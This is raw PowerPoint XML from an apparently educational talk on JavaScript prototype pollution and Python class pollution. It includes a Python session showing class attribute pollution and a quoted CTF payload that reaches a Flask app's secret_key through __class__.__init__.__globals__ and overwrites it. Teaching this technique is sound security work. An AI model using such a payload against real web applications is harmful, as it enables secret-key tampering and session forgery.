              <a:t>) [MSC v</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>.1938</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> bit (AMD64)] on win32</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Type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"help"</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"copyright"</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"credits"</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or</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"license"</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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> more information.</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&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="880000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>A</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pass</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&gt;&gt;&gt; a = A()</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&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.hand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Traceback (most recent call last):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File </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&lt;stdin&gt;"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="8A7B52"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00979D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &lt;module&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.hand</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>AttributeError</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'A'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> object has no attribute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'hand'</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&gt;&gt;&gt; A().__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>class__.hand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"knife“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> # polluter</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;&gt;&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>a.hand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> # polluted</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>'knife'</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858D14A-12C2-2706-D459-8C5809CBDF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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22603639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B6043-C7C5-23B5-0D34-8A44E75D5E04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Class pollution in Python 2</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B54AECA4-BAE2-862E-C7D7-C286190626D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>There are differences from the vulnerability in JavaScript, of course, but we will not go over it in this presentation for being out of scope</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>For a CTF challenge and a writeup on class pollution in Python, see </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeup/36991</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Payload example from the above CTF challenge:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="146050" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="434F54"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>__class__.__init__.__globals__.__spec__.loader.__init__.__globals__.sys.modules.__main__.app.secret_key = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="005C5F"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"test"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-HK" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A858D14A-12C2-2706-D459-8C5809CBDF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pic>
        <p:nvPicPr>
          <p:cNvPr id="2053" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0068A7EC-0387-AB60-CB95-272EB1E84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2778" y="3042850"/>
            <a:ext cx="3908772" cy="19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1525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02A8-CB2F-A5EF-B3F4-621948B61699}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Class pollution</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9808502A-DED5-A065-A59D-48CDF42AD04C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Unfortunately, Python seems to be the only popular programming language that has class pollution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>That is because most programming languages with classes cannot change the class after creation, such as Java</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>This is really the end for prototype pollution and class pollution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>If you want to go further, combining prototype pollution and class pollution with other techniques is the way to go; the sky is the limit</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F838D99E-B5A4-653B-1896-FC2315BF33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spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32028539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235FD2-A294-D299-0FCC-FFDEF6702BEB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Completed at 2024-05-06T03:14+08:00</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{138CBA05-71FB-3C1A-3CA1-88F2ADBE23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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="A cartoon cat with its eyes closed&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0614066-B344-C21F-E14C-CD56C98EA98A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2801452" y="911861"/>
            <a:ext cx="3541096" cy="3319778"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2070336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D9F8C-DDB3-9CFF-CD5C-9340C245A340}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>References</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>(please skip me)</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E34BD9BB-9374-9ADE-C59B-37497A7B7D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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27290008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AAAF-35E4-449B-7681-BB7C41F819C4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Credits</a:t>
            </a:r>
            <a:endParaRPr lang="zh-HK" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB322EEF-3947-4FD3-639D-34301AF8DE61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>References are on the bottom left corner of the pages where they are referenced</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>All references are listed starting from the next slide, in alphabetical order, deduplicated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>It also acts as a further reading list</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" dirty="0"/>
              <a:t>Special thanks to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://github.com/DuckOfDisorder/BlobCats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> for having so many </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0" err="1"/>
              <a:t>blobcats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> to choose from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://ctftime.org/writeups?hidden-tags=prototype-pollution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t> for having so many writeups to read from</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="2400" dirty="0"/>
              <a:t>And you</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="1300" dirty="0"/>
              <a:t>, for listening patiently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-HK" sz="800" dirty="0"/>
              <a:t>(or not)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57F6D672-502A-504A-DC49-0BC8120E99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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1176852155"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Streamlin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2773</TotalTime>
  <Words>12115</Words>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>843</Paragraphs>
  <Slides>106</Slides>
  <Notes>40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106</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="115" baseType="lpstr">
      <vt:lpstr>Lato</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Aptos</vt:lpstr>
      <vt:lpstr>Raleway</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Consolas</vt:lpstr>
      <vt:lpstr>Courier New</vt:lpstr>
      <vt:lpstr>Cambria</vt:lpstr>
      <vt:lpstr>Streamline</vt:lpstr>
      <vt:lpstr>JavaScript prototype pollution</vt:lpstr>
      <vt:lpstr>Before we begin…</vt:lpstr>
      <vt:lpstr>Let’s get ready!</vt:lpstr>
      <vt:lpstr>Code of ethics</vt:lpstr>
      <vt:lpstr>About the speaker</vt:lpstr>
      <vt:lpstr>COMP 3021S JavaScript programming (0 units)</vt:lpstr>
      <vt:lpstr>What is JavaScript?</vt:lpstr>
      <vt:lpstr>Data type</vt:lpstr>
      <vt:lpstr>Data type demonstration</vt:lpstr>
      <vt:lpstr>Object property</vt:lpstr>
      <vt:lpstr>Object property access</vt:lpstr>
      <vt:lpstr>Object property access 2</vt:lpstr>
      <vt:lpstr>Object property access 3</vt:lpstr>
      <vt:lpstr>Desmond</vt:lpstr>
      <vt:lpstr>Object property getter [1] and setter [2]</vt:lpstr>
      <vt:lpstr>Object property getter and setter 2</vt:lpstr>
      <vt:lpstr>End of COMP 3021S</vt:lpstr>
      <vt:lpstr>[[Prototype]] (why blobcats control everything)</vt:lpstr>
      <vt:lpstr>{}</vt:lpstr>
      <vt:lpstr>An empty object</vt:lpstr>
      <vt:lpstr>Prototype [1]</vt:lpstr>
